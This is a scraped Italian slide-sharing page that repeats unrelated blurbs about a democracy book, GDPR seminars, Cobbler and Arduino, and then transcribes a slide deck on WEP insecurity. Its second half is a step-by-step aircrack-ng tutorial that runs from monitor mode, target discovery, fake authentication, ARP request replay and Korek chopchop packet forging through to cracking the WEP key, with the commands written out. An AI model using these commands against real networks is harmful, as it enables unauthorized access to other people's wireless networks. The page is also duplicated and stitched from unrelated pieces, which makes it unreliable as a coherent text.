✦ Introduzione
✦ Connessioni TCP lato client: la classe
Socket
✦ Connessioni TCP lato server: la classe
ServerSocket
✦ Struttura di un server multi-threaded
✦ Introduzione
✦ Connessioni TCP lato client: la classe
Socket
✦ Connessioni TCP lato server: la classe
ServerSocket
✦ Struttura di un server multi-threaded
Karen desoto’s presence as a legal analystKaren Desoto
Karen is an alumnus of Rutgers University, and the Beasley School of Law (Temple University). She has earned a Juris Doctorate and Masters of Law Degree in Trial Advocacy. For more details you can visit other official site @ http://karendesoto.info/
Le nuove Regole tecniche sulla conservazione dei documenti informatici appena pubblicate in G.U. hanno dato il definitivo riconoscimento al Responsabile della Conservazione digitale e al Responsabile del trattamento dati, due professionisti IT la cui presenza è ormai obbligatoria per tutti gli enti pubblici e le aziende che gestiscono documenti informatici e fatturano elettronicamente e per i quali ANORC Professioni ha aperto i primi Registri nazionali.
vignette di Andrea Lisi
Questo Sillabario non è stato scritto per fare letteratura politica, ma semplicemente per iniziare un dialogo con chi, deluso o disgustato, si è rifugiato in una aristocratica astensione dal voto, e con quanti votano per un dovere morale più che per la speranza in un cambiamento. Si parte da lontano, dall’antica Atene, dove nel VI secolo a. C. nacque una forma di governo straordinaria, la democrazia, grazie alla quale gli ateniesi seppero raggiungere livelli economici e culturali mai eguagliati. Seguono una breve - ma non priva di particolari inediti - analisi storica che evidenzia come il popolo abbia sempre subito la volontà di chi ha gestito il potere; un commento critico degli articoli della Costituzione relativi all’ordinamento dello Stato; l’analisi dello statuto dei maggiori partiti italiani, che scopre vistose e imprevedibili lacune della democrazia. Infine, l’autore propone un percorso per la costituzione di un organismo politico nel quale ogni decisione venga assunta dagli iscritti e che abbia come fine ultimo la realizzazione di una democrazia vera e diretta. Una sorta di appello a una cittadinanza attiva, senza alcun distinguo, un elemento di coesione per un percorso unitario. Il libro deve essere anche inteso come un invito a prendere esempio dalle laboriose api, per ricostruire la democrazia con uno spirito nuovo. Per dare, per un impegno etico, non per ricevere vantaggi.
L'autore
Giacomo Lisi, avvocato, è nato in San Pietro in Lama (Lecce). Dopo alcuni anni di insegnamento presso gli istituti superiori, si è dedicato alla libera professione.
Sempre animato da forte passione politica, ha collaborato con circoli e associazioni politico-culturali. Tuttavia, la difficoltà a condividere idee, progetti e strategie con altri soggetti politici lo ha tenuto lontano da esperienze attive. Questo Sillabario è il suo primo lavoro editoriale, nato da un costante esercizio di curiosità e ricerca e da una spinta morale all’impegno civile.
www.demo-crazia.it
vignette di Andrea Lisi
Venerdì 17 febbraio, alle ore 18, presso l'Open Space di Palazzo Carafa (P.zza Sant'Oronzo, Lecce) si è tenuta la presentazione del libro dell'Avv. Giacomo Lisi, Democrazia: dal passato, il futuro (edizioni ClioEdu).
A dialogare con l'autore, moderati dal giornalista Rai Antonio Gnoni, ci saranno Gabriele Conte (Ingegnere, CLIO S.p.A.), Elio Lia (Dirigente scolastico), Edoardo Pascali (Prof. ordinario Università del Salento) e, in collegamento BitMeeting, Donato Limone (Prof. ordinario Unitelma Sapienza, Roma) e Antonio Martino (Prof. ordinario Università di Buenos Aires).
Si parlerà di democrazia, dall'antichità ai giorni nostri, del rapporto tra potere e politica e soprattutto di come le nuove tecnologie (dal web al voto elettronico) possano agevolare la costruzione di un modello per la partecipazione diretta alla gestione della cosa pubblica di tutti i cittadini.
Tutti gli interessati, infatti, potranno partecipare all'evento e aderire alla nascente associazione attraverso il portale www.demo-crazia.it
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Una presentazione sulle (in)sicurezze delle rete wireless 802.11b, parlando di Wi-Fi, il wardriving e warchalking, cracking della crittografia WEP e WPA e delle tecniche di protezione della proprio rete
Karen desoto’s presence as a legal analystKaren Desoto
Karen is an alumnus of Rutgers University, and the Beasley School of Law (Temple University). She has earned a Juris Doctorate and Masters of Law Degree in Trial Advocacy. For more details you can visit other official site @ http://karendesoto.info/
Le nuove Regole tecniche sulla conservazione dei documenti informatici appena pubblicate in G.U. hanno dato il definitivo riconoscimento al Responsabile della Conservazione digitale e al Responsabile del trattamento dati, due professionisti IT la cui presenza è ormai obbligatoria per tutti gli enti pubblici e le aziende che gestiscono documenti informatici e fatturano elettronicamente e per i quali ANORC Professioni ha aperto i primi Registri nazionali.
vignette di Andrea Lisi
Questo Sillabario non è stato scritto per fare letteratura politica, ma semplicemente per iniziare un dialogo con chi, deluso o disgustato, si è rifugiato in una aristocratica astensione dal voto, e con quanti votano per un dovere morale più che per la speranza in un cambiamento. Si parte da lontano, dall’antica Atene, dove nel VI secolo a. C. nacque una forma di governo straordinaria, la democrazia, grazie alla quale gli ateniesi seppero raggiungere livelli economici e culturali mai eguagliati. Seguono una breve - ma non priva di particolari inediti - analisi storica che evidenzia come il popolo abbia sempre subito la volontà di chi ha gestito il potere; un commento critico degli articoli della Costituzione relativi all’ordinamento dello Stato; l’analisi dello statuto dei maggiori partiti italiani, che scopre vistose e imprevedibili lacune della democrazia. Infine, l’autore propone un percorso per la costituzione di un organismo politico nel quale ogni decisione venga assunta dagli iscritti e che abbia come fine ultimo la realizzazione di una democrazia vera e diretta. Una sorta di appello a una cittadinanza attiva, senza alcun distinguo, un elemento di coesione per un percorso unitario. Il libro deve essere anche inteso come un invito a prendere esempio dalle laboriose api, per ricostruire la democrazia con uno spirito nuovo. Per dare, per un impegno etico, non per ricevere vantaggi.
L'autore
Giacomo Lisi, avvocato, è nato in San Pietro in Lama (Lecce). Dopo alcuni anni di insegnamento presso gli istituti superiori, si è dedicato alla libera professione.
Sempre animato da forte passione politica, ha collaborato con circoli e associazioni politico-culturali. Tuttavia, la difficoltà a condividere idee, progetti e strategie con altri soggetti politici lo ha tenuto lontano da esperienze attive. Questo Sillabario è il suo primo lavoro editoriale, nato da un costante esercizio di curiosità e ricerca e da una spinta morale all’impegno civile.
www.demo-crazia.it
vignette di Andrea Lisi
Venerdì 17 febbraio, alle ore 18, presso l'Open Space di Palazzo Carafa (P.zza Sant'Oronzo, Lecce) si è tenuta la presentazione del libro dell'Avv. Giacomo Lisi, Democrazia: dal passato, il futuro (edizioni ClioEdu).
A dialogare con l'autore, moderati dal giornalista Rai Antonio Gnoni, ci saranno Gabriele Conte (Ingegnere, CLIO S.p.A.), Elio Lia (Dirigente scolastico), Edoardo Pascali (Prof. ordinario Università del Salento) e, in collegamento BitMeeting, Donato Limone (Prof. ordinario Unitelma Sapienza, Roma) e Antonio Martino (Prof. ordinario Università di Buenos Aires).
Si parlerà di democrazia, dall'antichità ai giorni nostri, del rapporto tra potere e politica e soprattutto di come le nuove tecnologie (dal web al voto elettronico) possano agevolare la costruzione di un modello per la partecipazione diretta alla gestione della cosa pubblica di tutti i cittadini.
Tutti gli interessati, infatti, potranno partecipare all'evento e aderire alla nascente associazione attraverso il portale www.demo-crazia.it
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2...Digital Law Communication
Materiali relativi al seminario“Privacy e protezione del dato. Gli adempimenti del nuovo Regolamento UE 679/2016”organizzato dall’Associazione LAICA Salento con la collaborazione del Digital & Law Department.
Una presentazione sulle (in)sicurezze delle rete wireless 802.11b, parlando di Wi-Fi, il wardriving e warchalking, cracking della crittografia WEP e WPA e delle tecniche di protezione della proprio rete
L'installazione e la prima configurazione di un elevato numero di server è un'operazione lunga e ripetitiva. Il TechAdvisor Roberto Polli mostra come semplificarla utilizzando Cobbler, un'installation server open source. La tecnologia descritta da Roberto sfrutta il boot via rete (PXE-boot) e i kickstart di Red Hat, i file che contengono i parametri per l'installazione e la prima configurazione del sistema.
Oltre a Cobbler, l’articolo illustra alcuni concetti di base relativi alla procedura di boot di un sistema Linux-based e al funzionamento di un server DHCP.
Per saperne di più su questo argomento vi invitiamo a scaricare l’articolo completo. Potete inviarci le vostre domande utilizzando il form "Serve aiuto?" del nostro Centro Risorse http://www.babel.it/it/centro-risorse.html
Corso di 20 ore sulla piattaforma Arduino. Corso tenuto nelle scuole superiori di San Secondo e Fornovo come corso di aggiornamento per il personale docente. Il corso si suddivide in 5 lezioni dove vengono spiegate più o meno tutte le funzionalità della piattaforma. I file li potete trovare al seguente indirizzo https://github.com/loweherz/ArduinoLessons
1. Wireless:
Questa insostenibile leggerezza
dell'essere...
WEP
http://www.wardriving.it - http://www.backtrack.it By Aspy
2. Il wireless
Come funziona l'autenticazione fra access point e client
Al momento della connessione si attiva il four-way-handshake
1)Il client fa una richiesta di autenticazione all'AP (client
connesso)
2)L'AP risponde inviando un pacchetto da 128 byte in chiaro
3)Il client risponde reinviando tale pacchetto crittato con la chiave
comune (shared Key)
4)L'AP fa un check per verificare che il pacchetto sia stato crittato
correttamente e garantisce al client la connessione in caso
affermativo (client autenticato)
Quindi si possono sniffare pacchetti crittati ed i corrispondenti
pacchetti in chiaro :-)
3. Il wireless
Come funziona l'autenticazione fra access point e client
●La chiave comune (40 o 104bit) viene concatenata al IV
(initialing vector) per creare la chiave rc4 che viene usata per
crittare i pacchetti tramite XOR
● chiave di crittazione=rc4(chiave+IV)
●L'IV viene inviato in chiaro.
●l'IV è lungo 24 bit, pertanto: 24 bit == 2^24 chiavi
●Con abbastanza traffico, si fa in fretta ad utilizzare tutte le
possibili combinazioni di IV, quindi gli stessi IV vengono riutilizzati
più volte.
Dato che i pacchetti vengono crittati con XOR, e conoscendo IV,
avendo abbastanza pacchetti è possibile risalire alla chiave.
Nota: per le caratteristiche dei pacchetti ARP, si conoscono a priori
i primi 16 byte del pacchetto, facilitando il crack della chiave
4. La trasmissione wireless
Possibili attacchi al WEP
1) Deautenticazione: (solo WPA) scollega un client dall'AP a cui
è associato per indurlo a richiedere l'autenticazione ottenendo
pacchetti di 4-way-handshake.
2) Fake autentication: utile per collegarsi all'AP anche se filtra i
MAC address
3) Interactive packet replay: replica i pacchetti letti stimolando
l'AP a fare altrettanto, raddoppiando di fatto il traffico generato
4) Arp request reinjection: si individua una richiesta ARP che
viene reinviata ripetutamente in modo da generare continue
risposte e quindi traffico utile
5) Korek chopchop: Basandosi su metodi statistici di
criptoanalisi si ricava la chiave WEP sfruttando le debolezze del
protocollo RC4.
5. Comandi per gestire la scheda wireless
Ifconfig -a : Lista tutte le interfacce
Ifconfig wlan0 up/down : accende /spegne interfaccia
Iwconfig : mostra schede wireless
Iwconfig wlan0 essid pippo : associa la scheda all'AP con sid “pippo”
Iwconfig wlan0 essid pippo key aabbccddeeff : associa la scheda all'AP
con sid “pippo” e chiave wep “aabbccddeeff”
Iwconfig wlan0 mode monitor : pone la scheda in modalità monitor
Iwconfig wlan0 mode managed : pone la scheda in modalità standard
Iwlist wlan0 scan : effettua scansione per individuare reti wi.fi
7. AIRCRACK-NG
●Aircrack-ng – tool per il crack
●Airmon-ng – configura la scheda in mode monitor
●Airodump-ng – colleziona in pacchetti
●Aireplay-ng – inietta pacchetti arp
Attenzione: per verificare se la proprio scheda di
rete permette di fare injection, usare il seguente
comando
#aireplay-ng -9 ath0
La risposta deve contenere:
Device injection capabel was found
8. AIRCRACK-NG
Vediamo un attacco veloce da eseguire contro una
rete con client attivi, denominato ARP REQUEST
REPLAY. Viene catturato un pacchetto con una
richiesta ARP generata da un client e viene
replicato “iniettandolo” nella rete al fine di stimolare
l'AP a produrre un elevato numero di pacchetti
contenenti IV.
9. AIRCRACK-NG – fase 1 configurazione
Configurare velocità (da settare appropriatamente)
#iwconfig <interfaccia> rate 1M
Mettere la scheda in modalità monitor
#Airmon-ng start wlan0
Questo crea una scheda virtuale “mon0” che
useremo per il dump dei pacchetti
Per ripristinare modalità managed
#Airmon-ng stop wlan0
#Airmon-ng stop mon0
10. AIRCRACK-NG – fase 2 ricerca bersaglio
#Airodump-ng mon0
Vengono mostrate le reti trovate, la cifratura, il sid
(ESSID), il segnale, il mac (BSSID), il canale
Segnatevi i dati della rete trovata (ESSID, BSSID,
canale)
Segnatevi anche il mac della vostra scheda wi.fi
11. AIRCRACK-NG – fase 3 acquisizione dati
Iniziate l'acquisizione
#Airodump-ng -c [canale] -b [BSSID] -w [file dump]
mon0
Dovete indicare il canale ed il mac dell'AP
-w indica il nome del file dove memorizzare i pacchetti
catturati
12. AIRCRACK-NG – fase 4 fake authentication
Si deve stimolare l'emissione di pacchetti ARP. Per fare
questo prima si effettua una associazione all'AP
Associatevi all'AP
#Aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [MAC] mon0
Dove e = SID
Dove a = mac AP
Dove h = mac scheda wi.fi
13. AIRCRACK-NG – fase 5 ARP request injection
Poi si stimola l'emissione di ARP packet da catturare
mediante injection. Nei pacchetti si trova l'IV, che sarà
utilizzato per il crack vero e proprio
Avvio della injection
#Aireplay-ng -3 -b [BSSID] -h [MAC] mon0
Dove b = mac AP
Dove h = mac scheda wi.fi
14. AIRCRACK-NG – fase 6 crack della WEP KEY
Dopo avere raccolto un numero sufficiente di pacchetti si
può lanciare il programma che tenta il crack della chiave
Avvio del programma di decrittazione
#Aircrack-ng file.cap
15. AIRCRACK-NG
Proviamo un attacco contro access point senza client
wireless attivi, denominato Korek chopchop.
In questo caso viene analizzato un pacchetto emesso
dall'AP per estrarre i dati necessari a creare un falso
pacchetto ARP request che viene iniettato nella rete per
ottenere pacchetti contenenti IV.
16. AIRCRACK-NG – le fasi 1, 2, 3, 4 sono le stessse del
precedente esempio
1) configurazione scheda
#Airmon-ng start wlan0
2) ricerca bersaglio
#Airodump-ng mon0
3) cattura dei pacchetti
#Airodump-ng -c [canale] -b [BSSID] -w [file dump] mon0
4) associazione all'AP
#Aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [MAC] mon0
17. AIRCRACK-NG – fase 5 ricerca pacchetto
Per completare l'attacco ci serve un pacchetto emesso
dall'AP. Questo viene catturato ed analizzato al fine di
forgiare un pacchetto ARP da iniettare.
#aireplay-ng -4 -b [BSSID] -h [MAC] mon0
Quando viene catturato un pacchetto adatto viene chiesta
conferma per il suo l'utilizzo. Quindi automaticamente
viene creato un file .xor necessario per creare il pacchetto
arp da iniettare.
18. AIRCRACK-NG – fase 6 creazione falso ARP
Chiediamo a packetforge di creare un pacchetto ARP a
partire dal file xor e salvarlo nel file pacchetto_arp.cap
#packetforge-ng -0 -a [BSSID] -h [MAC] -k
255.255.255.255 -l 255.255.255.255 -y [pacchetto.xor] -w
pacchetto_arp.cap
19. AIRCRACK-NG – fase 7 iniezione falso ARP
Quindi iniettiamo il pacchetto creato ed aspettiamo di
avere 30000-40000 ivs.
#aireplay-ng -2 -r pacchetto_arp.cap mon0
20. AIRCRACK-NG – fase 8 crack della WEP KEY
Dopo avere raccolto un numero sufficiente di pacchetti si
può lanciare il programma che tenta il crack della chiave
Avvio del programma di decrittazione
#Aircrack-ng file.cap